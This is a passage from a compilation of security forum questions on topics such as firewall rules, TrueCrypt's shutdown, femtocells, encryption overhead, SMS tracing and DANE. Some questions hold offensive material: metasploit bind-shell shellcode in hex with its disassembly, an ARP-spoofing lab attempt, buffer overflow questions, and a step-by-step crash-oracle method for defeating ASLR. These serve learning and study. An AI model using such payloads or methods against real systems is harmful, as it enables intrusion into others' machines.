ElasticSearch port (9200) was open to the world, because Kibana requires it to view the nice graphs. Redis ports (6379) were restricted to only 5 known hosts via iptables.
Cherokee webserver runs on port (8080) not default of 80 and was open to the world.
SSH does not seem to be compromised. The server uses keys and no password authentication
is allowed. We run SSH on port 2020, which is listed as (xinupageserver) in iptables.
Here are the iptables rules. Notice redis is restricted to web hosts,
but http via Cherokee (webcache) and ElasticSearch (wap-wsp) are open.
➜ ~ iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
REJECT all -- anywhere loopback/8 reject-with icmp-port-unreachable
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere state NEW tcp dpt:xinupageserver
ACCEPT tcp -- web1.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web2.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web3.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web4.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- web5.mydomain.com anywhere tcp dpt:6379
ACCEPT tcp -- anywhere anywhere tcp dpt:wap-wsp
ACCEPT tcp -- anywhere anywhere tcp dpt:webcache
ACCEPT icmp -- anywhere anywhere icmp echo-request
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
Chain FORWARD (policy ACCEPT)
target prot opt source destination
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
Thanks so much for the help.
|
I'm going through my GPG keychain. I've got keys for a few strangers in my keychain. I don't recall exchanging keys, and I'm not sure how the public keys came to be installed in the keychain. I think (perhaps incorrectly) they may have been installed by GPG for Mac OS X, but I'm not certain.
I did find some references to one of them relating to Firefox, but I do not use a GPG/Firefox plugin, so the browser and the keychain should be disjoint.
What could be the reason for this?
|
I am seeing quite a few browser "version 0.0" entries in my visitor log. Can anyone explain the significance of this? Please see the examples below. Thanks.
Safari version 0.0 running on ChromeOS
Chrome version 0.0 running on Win8.1
Chrome version 0.0 running on Win7
Chrome version 0.0 running on WinXP
Google Web Preview version 0.0
AppEngine-Google version 0.0
Google Feedfetcher version 0.0
BingPreview version 0.0
WinHttp version 0.0
|
NIST recommends FIPS 181 as a random password generator for "easy to remember" passwords.
As far as I understand the standard,
it will generate a password that is all lowercase, made of pronounceable syllables.
My question is whether there is an alternative standard which:
includes, besides the lowercase alphabet, uppercase letters as well as digits
is not necessarily easy to remember
If there is no standard for such a password generator, should I simply change the seed for FIPS 181, or is there a better alternative?
|
At our office we have bad 3G reception. We bought a femtocell device that provides a 3G connection for one specific mobile provider. This device is connected to our network via Ethernet. I cannot use it at our office, because I use another provider.
Thinking about this: I could be using connections like this without knowing it. Take an imaginary John, living in an area with bad reception. He has bought and installed his own femtocell at home. Not only does he connect to this device, but so does everybody in range of it, no?
When my direct connection to my provider fails and I'm in range of John's home femtocell, my SMS, phone conversations, and internet data are transferred over his home network.
Is this traffic encrypted and safe?
Is it true that anybody can connect to this device and use bandwidth?
When a phone connects to this femtocell, does it have access to the local LAN?
|
So I just used metasploit to generate the payload/linux/x86/shell_bind_tcp payload without null bytes (generate -t raw -b '\x00' -f shellcode). Here's the shellcode:
$ xxd -p shellcode
dbddd97424f45e33c9bf0e0f5844b114317e1983c604037e15ecfa699f07
e7d95cb482dfebdbe386269b5f19ebf35da51a5f08b54d0f455407c90d5a
589cef60ea9a5f0ec122dc7fbfef63ec19855c4b57d9ea129fb1c3cb2c29
743bb1c0eacad642a045f9d24d9b7a
And here's what objdump thinks the shellcode is:
$ objdump -D -b binary -m i386 shellcode
shellcode: file format binary
Disassembly of section .data:
00000000 <.data>:
0: db dd fcmovnu st,st(5)
2: d9 74 24 f4 fnstenv [esp-0xc]
6: 5e pop esi
7: 33 c9 xor ecx,ecx
9: bf 0e 0f 58 44 mov edi,0x44580f0e
e: b1 14 mov cl,0x14
10: 31 7e 19 xor DWORD PTR [esi+0x19],edi
13: 83 c6 04 add esi,0x4
16: 03 7e 15 add edi,DWORD PTR [esi+0x15]
19: ec in al,dx
1a: fa cli
1b: 69 9f 07 e7 d9 5c b4 imul ebx,DWORD PTR [edi+0x5cd9e707],0xebdf82b4
22: 82 df eb
25: db e3 fninit
27: 86 26 xchg BYTE PTR [esi],ah
29: 9b fwait
2a: 5f pop edi
2b: 19 eb sbb ebx,ebp
2d: f3 5d repz pop ebp
2f: a5 movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
30: 1a 5f 08 sbb bl,BYTE PTR [edi+0x8]
33: b5 4d mov ch,0x4d
35: 0f 45 54 07 c9 cmovne edx,DWORD PTR [edi+eax*1-0x37]
3a: 0d 5a 58 9c ef or eax,0xef9c585a
3f: 60 pusha
40: ea 9a 5f 0e c1 22 dc jmp 0xdc22:0xc10e5f9a
47: 7f bf jg 0x8
49: ef out dx,eax
4a: 63 ec arpl sp,bp
4c: 19 85 5c 4b 57 d9 sbb DWORD PTR [ebp-0x26a8b4a4],eax
52: ea 12 9f b1 c3 cb 2c jmp 0x2ccb:0xc3b19f12
59: 29 74 3b b1 sub DWORD PTR [ebx+edi*1-0x4f],esi
5d: c0 ea ca shr dl,0xca
60: d6 (bad)
61: 42 inc edx
62: a0 45 f9 d2 4d mov al,ds:0x4dd2f945
67: 9b fwait
68: 7a .byte 0x7a
This link also gives a similar disassembly: http://www.onlinedisassembler.com/odaweb/x1SSxJ/0
I might be wrong, but this shellcode seems strange. First of all, it doesn't work, but that's not enough to show that it's wrong. The second issue is that objdump says (bad) near the bottom, which probably means the assembly is wrong. The final thing is that I have no clue what it's doing after reading the assembly. Generating the shellcode for this same payload with null bytes gives correct, readable assembly. I don't think removing null bytes can add this much complexity to the shellcode.
Did I do something wrong? If not, can someone explain how the shellcode works?
|
I have my own suspicions that there are blocked users of my website that use Teamviewer to login to my site from their friends' pc. Is there any way to identify if the one who visit a website is using the Teamviewer at the same time?
|
If I go to https://google.com/q=test_query with from my browser, what traffic can be seen on the router?
Can the domain name (google.com) be seen?
If so, can I block all of the traffic to a web page by disallowing access to that domain? Does anything change if the website has multiple IPs (different servers)?
Thanks!
|
In other words, how easy is it to break into Windows without having the passwords for any of the users configured in the computer?
|
I am trying to encrypt few database columns (string values) using Java AES algorithm. This is to protect certain sensitive data. For some users these data should decrypted.
In Java AES encryption, if my input character length is 60, I am getting encrypted string length as 88.
But I don't want a change the length of the encrypted data. We have huge amount to tables and many applications are using those tables. We want to minimize the impact of encrypting certain fields in the tables.
Is there is any recommended solution? OR is there is any recommended algorithm, code sample, etc?
Thanks, Prabakaran N
|
As stated in the title.
In my lab I am trying to arpspoof a so called "victim pc" that is using Windows 7.
I do arp spoofing with arpspoof, but once run arp -a on the victim I see that the gateway entry is not changed. Maybe because the entry associated with the gateway is set to static.
In a situation like this, there is no way to arpspoof the victim?
|
A recent laptop theft, as well as concern that the data upon it might be deliberately accessed (on a drive with encryption or not), head lead me to think about how one might retroactively seek to regain possession of such a laptop, or at least how one might go about gaining leads as to who might have taken it - or where it might be.
If the stolen device were to include a unique file - lets call it Project_X.doc - and this same file were on another device available to the aggrieved, then might it be possible to track down the location of the device through location of the mentioned file?
I am not sure how this might work.
One obvious way would be a trap file that might appeal to a would-be invader that proceeds to send information to a secure email recipient, revealing its location. Kind of virus-like. The only problem with this (besides assumption that it'll be juicy enough bait to bite) is that it involves a degree of foresight and is not a measure that can be applied retrospectively.
The same would apply to registering the device itself with an online site permitting for its tracking. Not retroactive.
Could there simply be two identical files - on for use as a 'fingerprint' file, and another within the stolen device - that could be used to track the location without foresight other than 'happening to have the same file' on another device?
It would also be appreciated if at least a brief 'why yes' or 'why not' could also be included. I am no security pro by many a yard :)
|
Using a buffer overflow, I have been able to override return addresses. But the problem is that Windows addresses contain zeros at the beginning (e.g. 0x00401020). As a result, the objdump of any C binary will contain zero's. This makes it very difficult to execute shellcode inside a buffer as a shellcode cannot contain zero's for it to work.
Has anyone done this sort of thing? It does not matter even if the exploit is printing hello-world: is it possible?
|
I got a question that says "What is the major difference in the USB propagation system used by Flame with regard to Stuxnet to prevent being identified?".
After Googling for a while, I haven't found anything about this.
|
We have a situation where a user's identity can be verified as follows: the network provider knows the identity of the user and injects secure headers into the HTTP request, which our servers can use to authenticate the user.
We're writing client-server applications and want to use this mechanism to automatically authenticate the user. We can't use HTTPS end-to-end for the authentication request because obviously the network couldn't inject headers in that case.
EDIT: roughly equivalent setup:
(client <-VPN-> HTTP proxy) <-internet-> our server
Assume the VPN (bold section) is secure and the user is authenticated within in the VPN.
The client generates a HTTP request. A proxy within the network knows the client's identity and generates a token which is automatically added to the headers in the proxied HTTP request. All of this happens in a secure domain and cannot therefore be compromised. (Unfortunately we can't change anything in the VPN setup, such as have the proxy make a HTTPS request instead.)
Our server can query back to the network (securely) to determine the identity of the client who initiated the request.
Assumptions:
This HTTP requirement is a given and can't be changed.
An attacker can't fool the identity verification process by presenting fake headers.
An attacker might be able to otherwise intercept/compromise the HTTP request/response.
Server is stateless (so no storing one-time keys server-side).
Storing a private key in the client application is not an option as it could be compromised
The HTTP request/response will be used auto-authenticate the user, but all other interactions before (if necessary) and afterward will be over HTTPS.
Here's what we've tried so far:
Client fetches a public key PK from server over HTTPS
Client generates a symmetric key SK
Client encrypts SK using PK, and sends this to server over HTTP
Server verifies user's identity and generates authentication token AT
Server encrypts AT using SK -> E(AT,SK)
Server signs E(AT,SK) using its private key and sends to client
Client uses PK to verify signature
Client uses SK to decrypt E(AT,SK) giving AT
Client uses AT to authenticate all subsequent HTTPS traffic.
(And we should probably use separate key pairs for encryption and signing, but let's ignore that for now).
As far as I can see, this is secure against eavesdroppers (as they won't have SK) but if a malicious attacker can modify the HTTP request, there is nothing stopping them from generating their own symmetric key instead of SK, encrypting it with PK, replacing the request payload with that and the server will have no idea that it's not talking to the real client. The server will then happily encrypt a valid AT and send it back to the attacker who can then proceed with impunity.
Is there a way to shore up this hole? Is it even possible to do this with a stateless server?
EDIT: if the server can detect tampering and abort the authentication process, that would be sufficient. "This is not possible because X" is also a valid answer, if it can be demonstrated.
|
Is it possible to trace the source or destination (location, even coordinates) of an SMS message ?
If it is, is it possible to do it even if the phone is roaming in a different country ?
|
1.4 install personal firewall software on any mobile and/or employee-owned computers with direct connectivity to the Internet (for example, laptops used by employees), which are used to access the organization’s network.
If company employees have their own mobile devices that don't connect to the internal network however they do connect to an internet facing company mail server using encryption. In this case does this apply? How about for company owned phones with the same setup?
My thinking is that neither employee owned nor company owned phones would apply as long as there's no cardholder data in their email that would get stored on their phones. Any clarification on this would be greatly appreciated.
|
I have several clients that are having trouble logging into vendor's web service. When talking to the vendor about the issue, they told me to set them up with Chrome running in Windows XP compatibility mode. This is how they want the client to change the compatibility settings:
I have some reservations about this fix workaround, given that Microsoft does not support Windows XP anymore (unless you pay for it). Can running a browser in Windows compatibility mode be a security issue?
|
We have several applications that leverage AD
SAML (via Ping Federate)
LDAP authentication from 3rd party applications
Windows workstation / Exchange auth (Kerberos)
IIS and web components (su4user, impersonation, etc)
I have never deployed 2 factor auth in an AD environment and remember reading that RADIUS was leveraged in a way to accommodate many if not all of the scenarios above, with minimal impact to the end users.
Can anyone explain the infrastructure that is needed for a private corporation to deploy 2FA to their AD Forest, and allow 3rd parties (such as Salesforce, Dropbox, Office 365) to leverage that authentication?
|
How can find the efficiency of any biometric system is there an equation to find it?
How is the efficiency of a biometric security system?
|
From what I understand, when you send information to a website over SSL, you encrypt the information you send with their public key.
However, if you want to be able to decrypt the information they reply with, you are going to need a private/public key combination yourself. I don't ever recall having been prompted for an RSA key by my browser, or been required to generate one; where does this key come from?
If your browser creates one for you, is it generated once and then stored on your computer forever, or is a new key generated for every session or site?
|
The wonderful answer to the question "What can an attacker do with Bluetooth and how should it be mitigated?" suggests that frequently re-pairing Bluetooth devices is a "good idea™."
Are there any Bluetooth pairing sequence attacks such that it would be advisable to avoid pairing Bluetooth devices in public places? Or can I generally feel safe re-pairing my phone with a headset or a keyboard in public?
|
I'm trying to understand how this user impersonation might have taken place. Here's the scenario:
Our controller got a call from our bank this morning about a suspicious wire transfer request. After some back-and-forth with the controller and with the bank, we've established that this is what happened:
Somebody sent an email to the bank requesting a wire transfer using an old domain of ours: joe@olddomain.com. This is an old domain that we used to use for email and which we still own. Email service is still set up for this domain, however all email address have been replaced with aliases that forward email to addresses at our new domain.
The bank replied with instructions & a form to complete.
The bad guy sent back the form, completed and signed, from a hotmail address. The bank may also have spoken to the bad guy - that's not clear to me (since I'm getting the information second hand).
The bank called us (at our phone number on record) to confirm the transaction.
The question I have is this: how did the bad guy get the email which the bank sent? We have checked the logs for both our email systems (both old and new) and there are no recorded visits from any unusual IP addresses.
I think it was a simple "reply-to" header on the original email, and the person at the bank didn't notice that the reply was being sent to a different email. But shouldn't the bank have something in place to alert the user if the "reply-to" address is different from the "from" address?
My co-worker thinks the only other possibility is the bank's DNS record being hacked to redirect outgoing email. That seems highly improbable to me - is it possible that the bank's DNS record was hacked?
Finally, are there other ways for this to work?
|
The official TrueCrypt webpage now states:
WARNING: Using TrueCrypt is not secure as it may contain unfixed security
issues
This page exists only to help migrate existing data encrypted by
TrueCrypt.
The development of TrueCrypt was ended in 5/2014 after Microsoft
terminated support of Windows XP. Windows 8/7/Vista and later offer
integrated support for encrypted disks and virtual disk images. Such
integrated support is also available on other platforms (click here
for more information). You should migrate any data encrypted by
TrueCrypt to encrypted disks or virtual disk images supported on your
platform.
with detailed instructions for how to migrate to BitLocker below.
Is it an official announcement or just a tricky deface attack?
|
I have a web application where (among other things) customers can upload files and administrators can then download those files. The uploaded files are stored on ServerA and the web application used to upload/download those files runs on ServerB.
I would like to make it so that while the files are stored on ServerA they are encrypted and that only the web application can encrypt/decrypt, but my concern is that there might not be an effective way to store an encryption key, which would make the file encryption mostly for show.
I came across this question/answer which suggested some good ways to securely store a key, but I think that the most secure ones do not apply since I need different people to be able to decrypt the file.
For example, I cannot create a key based on user credentials, because customers must be able to encrypt all admin users must be able to decrypt (right?).
From what I can tell, my best option is to store the encrypted files on one server and store the encryption key in the code on my web server, but this does not seem particularly secure. It seems likely that if a malicious user gains access to one server they probably gain access to both.
My question - is it even worth implementing "encrypted files on ServerA" and "encryption key on ServerB", or would I just be kidding myself to think this is more secure? Is there an effective way to encrypt files based on the conditions that I laid out above?
|
I read an article from CSA that they rank service traffic hijacking as the #3 threat to cloud-services. Why is it worse for the user if an attacker hijacks its service traffic on cloud? What new exploits can the attacker take advantage of in a cloud-service compared to before?
I had a hard time phrasing this question so if anything is unclear please ask.
|
A typical strategy for defeating ASLR is to find both a buffer overflow bug and an information disclosure bug. But when attacking servers that are automatically restarted whenever they crash/die, is a buffer overflow bug enough? Can we use that buffer overflow bug to also give us the information disclosure capability?
Let me flesh out the scenario. Suppose I have a server program that processes a request from the network and will be automatically restarted on a crash, and suppose I have found a buffer overrun vulnerability (of a heap-allocated buffer B) in the server that I can reliably exploit by sending an appropriately crafted request to the server. Suppose also that I can detect when the server crashes (e.g., it might crash because I sent it a request that corrupted its memory and caused it to segfault; in any case, assume I can send it a request of my choice and determine whether it crashed or not while trying to handle that request). The server is using ASLR, and I want to derandomize ASLR so I can mount a code injection attack, but I don't know of a separate information disclosure bug -- the buffer overrun vulnerability is all I've got to work with.
Can I use this buffer overrun vulnerability for information disclosure, to learn the contents of memory after B?
Here's an example of the sort of attack I am imagining:
Suppose that the overflowable buffer B is 512 bytes long, and suppose there is a secret 8-byte pointer P stored immediately after B. Suppose field F of the request is copied byte-for-byte over B without any length check.
If I send a request with a 513-byte value for F, that'll be copied over B. If the 513th byte of my value differs from the first byte of P, then the value of P will be corrupted, and (assuming the program later dereferences P) then program will probably crash during processing of this request. On the other hand, if the 513 byte of my value matches the first byte of P, then P will remain unchanged, and the program will probably not crash.
So, I can imagine sending 256 requests, each with a different value for the 513th byte of field F; if 255 of them cause the server to crash and one does not, then I immediately know the value of the first byte of P. Now I can continue until I learn each of the bytes of P. This might be useful if the program is using ASLR: by learning the value of the pointer P, I can derandomize part of memory.
This is just a simple example. In practice, I would imagine there might be unused space after the end of B and before the next object stored in the heap, but you can imagine ways to adapt these techniques to deal with that situation as well (e.g., if the byte after B is unused, then you can overwrite it with anything and the server won't crash, so it's easy to detect locations that are unused, and continue the attack until you find the next object after B).
Does this attack work in practice? Does it provide an effective way to defeat ASLR, when you have a heap overflow in a server that's automatically restarted and when you have a way to detect crashes?
Are there any hurdles that I've overlooked that prevent this from working? For instance, I can imagine that if memory allocation for objects in the heap were non-deterministic and random, the attack would fail; but do platforms do that? Are the relative offsets between objects in the heap deterministic in practice, if you run the same program twice on the same inputs?
I am assuming that the buffer overflow allows overwriting B with arbitrary binary data that's totally under the attacker's control. (The attack won't work with a strcpy() or string-related overflow, since then the data is forced to be nul-terminated.) Also, let's assume that either the server is re-started using fork(), or for some other reason, part of the memory layout is the same each time the server is restarted. (For instance, this automatically holds on on Windows and Mac, since libraries are at the same base address every time you restart the server, and it holds for non-PIE processes on Linux.)
Credit: I am inspired by a method I recently read about for exploiting a buffer overflow bug of a stack-allocated buffer for information disclosure purposes. This was described in the Blind ROP paper recently published at IEEE Security & Privacy 2014. They show how to do it when the buffer B is allocated on the stack. In this question, I am asking whether their technique can be generalized to the case where the buffer B is on the heap.
|
I want to create my computer passwords with a RNG, but I am thinking about one thing: I would use python to write that script and the RNG is controlled by one seed, most likely the time. If I would generate my passwords with a RNG that is seeded with the time and someone knows about it, he could try to brute-force the generated passwords by using the time when I possibly created the passwords.
To put it short, in my opinion time is no good seed for a RNG if the output should stay secret, but what are good seeds for an RNG? I already heard of ideas like reading allocated memory (if it was just allocated, it should contain random bytes), using the current PID or using the last bits of the mouse cursor position. Which of these ideas (or other ideas) is really complete random?
|
I don't trust BitLocker. Probably backdoored and relies on TPM which can be hacked according to DEFON. It also does not allow for hidden partitions or other advantages like TrueCrypt.
With TrueCrypt and the state that it is in, are there any other open source options that can be trusted and not backdoored?
|
I am planning to use JSON as the data transport mechanism between my iOS app and my server (the server is a WCF service). While learning about JSON, I realized that all the data is passed around directly in the URL. I am sure this question gets asked a lot but I was not able to find anything concrete on the site.
Is there an alternative to sending JSON data directly in the URL?
If not, how do I secure it? I should be able to prevent everyone other than the app from requesting or sending data to the service. One way to do this to be put a 'key' as part of every request; one that is known only to the app and the server. This way I could reject all calls without the correct key. But what is to prevent someone from sniffing the data and forging a request?
Will SSL help here? If I have an SSL certificate, will it automatically encrypt all data to and from the app?
I am sure this is a very common scenario so I am looking for the most elegant way of solving this problem.
|
I'm made a small web service that gets urls, download them, and convert them for another format. Most of those urls are documents (doc, docs,...). Basically, I'm open them with MS-Word and convert their type.
Another critical assume is that my server will meet, in some day, an infected file within the given urls.
Now, I'm wondering how I'm can secure my machine from infected files attack? How I'm can detect it after it done?
I'm thought to run MS-Word with limited user. Not have success yet... but maybe i'll in the further.
What else I can do?
|
From what I understand, the certificate authorities (CAs) have to get their root certificate included in the browser.
What if the root certificate of a particular CA is not included in the web browser yet. Is there another way to get it in?
Maybe my question is not clear enough. The question shoud be : in a PKI hierarchical model, if subCAs have not root certificate include in web browser then how subCAs can get in?
|
Many people who live outside the US use "DNS unblockers" such as Unblock-Us to access region restricted services such as Netflix and Hulu. My understanding of these services is that for DNS requests to blocked services it instead returns an IP for one of their proxy services.
Netflix is approximately 5 times cheaper than the cheapest "pay TV" service in my country, so obviously DNS unblockers are a very attractive proposition. On the other hand, using DNS servers from some little known company is a huge risk! Obviously TLS provides some protection, but I'll acknowledge that I'd most likely fall for an SSL stripping attack for example.
My question is: What options are available to make these unblocking services less of a risk?
Currently, I have to set it as the default DNS service on my router because some of my devices don't have customisable DNS settings – however I override the DNS settings on my PCs to use Google's DNS or my ISP's. This would mitigate the risk somewhat, but it obviously doesn't help on devices that I want to use both Netflix and perhaps also access sensitive services, such as my iPad.
I was thinking I could perhaps set up my own DNS server (I have a media/file server on 247) which proxies DNS requests to say Google DNS ordinarily but uses my DNS unblocker for Netflix related requests. I'm not sure how to go about this, or how I might be able to determine what domains need to go to the unblocker.
|
I am having trouble finding out if a potential server configuration is secure. I have a server running a nginx reverse proxy that is accessible from a public ip address on the ports 80 and 443. I then have a private network that is internal to the machine nginx is running on with a 172.17.%.% address that only the machine can access. They are linux containers.
Is it secure to do a ssl connection to the reverse proxy then regular http to the containers running on the 172.17.%.% network as it is internal to the machine.
|
This has become a bit of a thought experiment for me.
Suppose someone would like to establish a pseudonym along with a corresponding PGP Key, how could other people verify the correspondence between the name and the key?
Generally, PGP keys are for real people, whose identity can be verified IRL, but that does not apply here.
My first original thought was that the pseudonym could be a name based on the key fingerprint, but then, depending on number of characters, it could be quite easy to generate a new key that also meets this requirement.
Could there be a strategy (potentially more social then technological) for someone to verify this correspondence?
Edit:
The potential purpose for a pseudonym with this requirement could be along the same lines as Satoshi Nakamoto, or a whistle blower. Wanting to constantly release documents or software that is verifiably from the owner of the pseudonym.
|
I have an c/c++ program used for encrypting data for communicating between two ends. Encryption is done using OpenSSL (0.9.8d-fips, Sep 2006). Think it'll be worthy to mention that I'm not much familiar with using OpenSSL.
The program works fine for larger packets. But the size overhead is very high when encrypting smaller size packets. I've done a test to demonstrate the issue.
+-------------+-----------------+-------------------+
| Input Chars | Encrypted Chars | Input/Encrypted % |
+-------------+-----------------+-------------------+
| 1 | 74 | 1.351351351 |
| 2 | 74 | 2.702702703 |
| 3 | 74 | 4.054054054 |
| 4 | 74 | 5.405405405 |
| 5 | 74 | 6.756756757 |
| 6 | 74 | 8.108108108 |
| 7 | 74 | 9.459459459 |
| 8 | 74 | 10.81081081 |
| 9 | 74 | 12.16216216 |
| 10 | 74 | 13.51351351 |
| 11 | 74 | 14.86486486 |
| 12 | 90 | 13.33333333 |
| 13 | 90 | 14.44444444 |
| 14 | 90 | 15.55555556 |
| 15 | 90 | 16.66666667 |
+-------------+-----------------+-------------------+
The test was done while incrementing the number of input characters from 1 to 10000 . Following graphs illustrate the results more clearly.
Graph 1: Encrypted size vs Input Size
Graph 2: Ratio vs Input size
From the second graph, it's clearly visible that the encryption overhead is very high for smaller inputs (size less than 300bytes).
Is this normal/acceptable? If it is so are there any alternatives (with less overhead). Because the application uses smaller packets heavily (Bundling them together is not an option).
As mentioned above, OpenSSL 0.9.8d is used, which is a bit older version (1.0.1g, April 2014, is available now). Will the problem be fixed if I upgrade it?
|
i play an android game which seems to send the player's high score in an encrypted format .
some thing like (f11cca35236eebbdc26a0ce45876d117)
a 32 character code
tried MD5 but no result found.
i wanna know is there any way i could decrypt it or at least find the encryption method?
thanks
|
In light of the current fiasco surrounding TrueCrypt, I have received considerable criticism from current clients and peers in the IT industry for my continued support of the open-source model. Such criticism is usually lumped in with ongoing dialogue on the virtues and failures of the open-source model following episodes such as heartbleed. I have attempted to point out that in spite of many news articles labeling TrueCrypt as open-source, the source-available label found on Wikipedia is more correct.
It conjunction with that distinction, I have argued that having the source code available for review is inherently more secure than not, but that it should not suggest the same level of trust as a project that follows an open-source development model including allowing redistribution of modified work. While my gut tells me this is a reasonable position to take, the difference is subtle and my ability to communicate it convincingly is limited.
Are there more concrete evaluations to go on than just my gut here? Is there a measurable difference in the relative security of source-available applications vs true open-source counterparts? If so, is it well established what factors exactly contribute to this? What about the OS development model specifically results in more secure code than just releasing code for review? Or does this boil down to opinion in the end?
Edit: does it make any difference whether the specific software in question is cryptography related?
|
I'm playing with adfs, and I'd like to store credentials in a session context during my questioning of the user. So, my question is, is it safe to store sensitive data in a session context?
Thanks
|
In a weird announcement on the TrueCrypt page it says that the software is unsafe so we should migrate to BitLocker.
If it is a prank it's sure not funny especially when it comes to data.
Since I want to switch to Linux as my primary OS, I was thinking about Encrypted LVM.
Is this secure just as TrueCrypt full-disk encryption ?
Is it susceptible to cold boot attacks ?
Are there any holes that can allow data recovery ?
Please shed a light on this topic because I bet the TrueCrypt message today raised a
lot of panic.
|
Unfortunately, TrueCrypt may have been discontinued yesterday.
I use LUKS on Linux, but I liked the fact that with TrueCrypt I had a portable solution across Windows, Mac, & Linux.
TrueCrypt has its own license, but it was Open Source. Are you aware of any reasonable fork of TrueCrypt or any other portable alternative?
Goals:
encrypt portable USB disks and flash drives
mountable at least on Linux and Windows (MAC is a plus)
easy setup (no need to recompile tons of stuff)
|
We are a medium sized company. Recently, one of the representatives of the finance department raised a question about the use of credit cards to shop on-line among different departments in our company.
His concern relates to cases when a person from Department X requests to make a purchase from a site directly from his/her office computer. The reason for doing so is having direct access to some sensitive data needed right at the moment of purchase.
Currently, a finance representative walks up to the employee's office and provides the CC number.
Obviously, the risk comes from the CC information stored under that session, associated with the user profile in the online store. Several risk scenarios arise from this: the user accidentally makes more purchases with that CC information, the information is leaked, or the user account is compromised.
We have proposed solutions such as using pre-paid credit cards, Verified by Visa, or SafetyPay, which require someone else (the finance department) to approve purchases after a purchase order is submitted (by the department user who purchases). However, not all online stores accept these payment methods, not even Verified by Visa.
An alternative solution is to make the purchaser sign a form where Department X accepts all responsibility derived from the use of this corporate credit card. Nevertheless, we think this measure lacks the prevention factor an information security strategy must embrace.
Any help?
|
I was using TrueCrypt until recently, when one of two things happened: either it was discontinued or its website, truecrypt.org, was hacked. Either way, I don't trust it anymore.
So I'm now looking for encryption that is both convenient (just drag and dropping a file into a container) and secure (in the sense that a Russian hacker won't break it).
No need to encrypt the whole HDD, nor individual encryption per file, but a volume encryption.
How can I tell which software is reliable, to avoid a repeat of the TrueCrypt mishap?
|
So I am interested in computer security, cryptography and security protocols. Thing is, everything I read is about theoretical usage of protocols, but how do those things work in real world?
Is there a book or paper I can read to understand how everything works in practice, i.e. how everything is implemented programmatically, not just on paper? I am not talking about implementing the cipher itself, but about how everything works together. Say I log in to internet banking and lots of things happen automatically regarding encryption, sessions, etc., but how can I see a real-world example of what is happening there?
|
I'm working on a mechanism to better handle group policy passwords in response to MS14-025. We formerly used this mechanism for setting the local admin account passwords on our workstations (primarily Windows 7)
To this end (see the method I've outlined below for specifics), my thought is to have these changed client-side via a scheduled task and save the resulting password to a restricted-access network drive. What kind of exposure am I creating by allowing these changes to occur locally, instead of pushing them out from a central location?
The only things I've come up with are memory scrapers and the ability to manipulate the random number generator, both of which should already require admin rights.
Background
Goals
Avoid storing plain text passwords in a GPP item.
Rotation on these passwords
Set unique password per device (avoid pass the hash attacks)
Proposed Method
Set up a scheduled task (deployed by group policy preference, using the system account)
Schedule monthly / quarterly / whatever
Run on local Admin login, after 30 minutes
Task runs executable / script which will
Set the admin password to a random string
Save password to a network directory, using computer name for reference
Enable auditing / restricted access rights / etc on this folder.
Combined with a secondary trigger - say 30 minutes after the local admin account is logged in to - and we'd have a pretty decent method for controlling these accounts with the additional benefit of knowing whomever is using the local Administrator account.
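A minimal sketch of what the scheduled task's payload could do (Python here for illustration; in practice this would more likely be PowerShell, and the share path, alphabet, and length are assumptions):

```python
import secrets
import socket
import string
import subprocess
from pathlib import Path

# Hypothetical restricted-access share where passwords are recorded per machine.
SHARE = Path(r"\\fileserver\admin-pw$")
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def random_password(length: int = 20) -> str:
    """Generate a cryptographically random password."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def rotate_local_admin() -> None:
    password = random_password()
    # Set the local Administrator password via the Windows built-in `net` tool.
    subprocess.run(["net", "user", "Administrator", password], check=True)
    # Record it under the computer name for retrieval by authorized staff.
    (SHARE / f"{socket.gethostname()}.txt").write_text(password)
```

The write to the share is the sensitive step: the auditing and restricted ACLs mentioned above are what keep this from becoming a plaintext password dump.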
|
Specifically, why are the most popular attack proxies written in Java? Is there anything in particular about the design of the Java language that makes writing tools like these simpler? Easier to maintain and update?
|
Many websites, including banks, use text messages as their primary or secondary means of authentication. In theory, it sounds like a perfect method, unless the user loses their phone or it gets infected with a virus.
However, are there any known attacks on text messages that don't rely on access to the actual phone? Is it perfectly safe to rely on text messages as an authentication method?
|
Given KeePassDroid, I'm considering some of the security implications of accessing KeePass databases on an Android device.
In the native applications for Windows, OSX, and Linux, whenever the database is locked or exited, the password is erased from memory by filling its location with zeroes.
Since Java itself does garbage collection in a different manner, is there a real, tangible concern over storing passphrases in memory in the JVM? How about in Dalvik for Android?
Other than setting this.password = null;, what can be done to ensure that the passphrase has been securely erased from memory?
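For what it's worth, the usual advice in managed runtimes is to keep the secret in a mutable buffer (a char[] in Java rather than a String) so it can at least be overwritten before the reference is dropped; whether the GC has already copied it elsewhere is outside your control. The same idea, illustrated in Python with a bytearray (a sketch of the concept, not Android code):

```python
def wipe(secret: bytearray) -> None:
    """Overwrite a mutable secret buffer in place. This is best-effort:
    the GC, or earlier copies (e.g. an immutable str the data came from),
    may still hold the bytes elsewhere in memory."""
    for i in range(len(secret)):
        secret[i] = 0

passphrase = bytearray(b"correct horse battery staple")
wipe(passphrase)  # passphrase is now all zero bytes
```

The key point is that an immutable string (Java String, Python str) cannot be wiped at all; only a mutable buffer gives you even this partial guarantee.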
|
Does DANE offer the ability to provide certificates for services, or just for hosts?
How does one specify a mail server with DANE? If my email is jd@foo.com but mail.bar.com is the mail server, do I publish a record for mail.bar.com or for the foo.com domain? Here, mail.bar.com may be operated by someone else (in my case it's my server, but my mail server is home to three domains).
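As far as I understand the SMTP case (RFC 7672), the TLSA record lives under the MX host's own name, so it is published in bar.com's zone by whoever runs that zone; foo.com only contributes the DNSSEC-signed MX record pointing at it. An illustrative record (the hash value is a placeholder):

```
; DANE for SMTP on mail.bar.com:
; usage 3 (DANE-EE), selector 1 (SubjectPublicKeyInfo), matching type 1 (SHA-256)
_25._tcp.mail.bar.com. IN TLSA 3 1 1 <hex SHA-256 of the server's public key>
```

Since the record name encodes port and protocol, one host can publish different certificates for different services.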
|
